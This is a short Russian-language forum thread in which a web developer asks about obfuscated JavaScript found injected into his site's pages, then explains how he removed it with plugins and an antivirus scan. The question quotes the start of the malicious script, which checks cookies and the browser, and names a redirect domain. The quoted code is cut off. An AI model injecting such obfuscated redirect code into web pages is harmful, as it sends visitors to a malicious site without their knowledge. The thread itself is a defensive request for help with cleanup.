@ikoit
Web Developer

Кто сталкивался с данным вирусом?

На сайте обнаружил вирус(код ниже), открыл в песочнице и его заблокировал malwarebytes. Подскажите пожалуйста, кто сталкивался, он только в html коде страниц сайта или сидит где ещё?
Вот код, который был на страницах.
<script>var _0x2cf4=['MSIE;','OPR','Chromium','Chrome','ppkcookie','location','https://www.wow-robotics.xyz','onload','getElementById','undefined','setTime','getTime','toUTCString','cookie',';\x20path=/','split','length','charAt','substring','indexOf','match','userAgent','Edge'];(function(_0x15c1df,_0x14d882){var _...CUT
  • Вопрос задан
  • 170 просмотров
Решения вопроса 1
@ikoit Автор вопроса
Web Developer
Кому интересно. Вирус можно удалить через код. Просто нашёл строчку кода и удалил её на всех страницах. Далее установил плагины, от малварей. И полностью проверил антивирусом весь сайт. Использовал virusdie. Больше данный вирус не тревожит.
Ответ написан
Комментировать
Пригласить эксперта
Ответы на вопрос 1
Nolis
@Nolis
it-гопник
обфусифицированный код, вряд ли кто-то сталкивался, я думаю он уникален, дело-то пяти минут его зашифровать
Ответ написан
Ваш ответ на вопрос

Войдите, чтобы написать ответ

Войти через центр авторизации
Похожие вопросы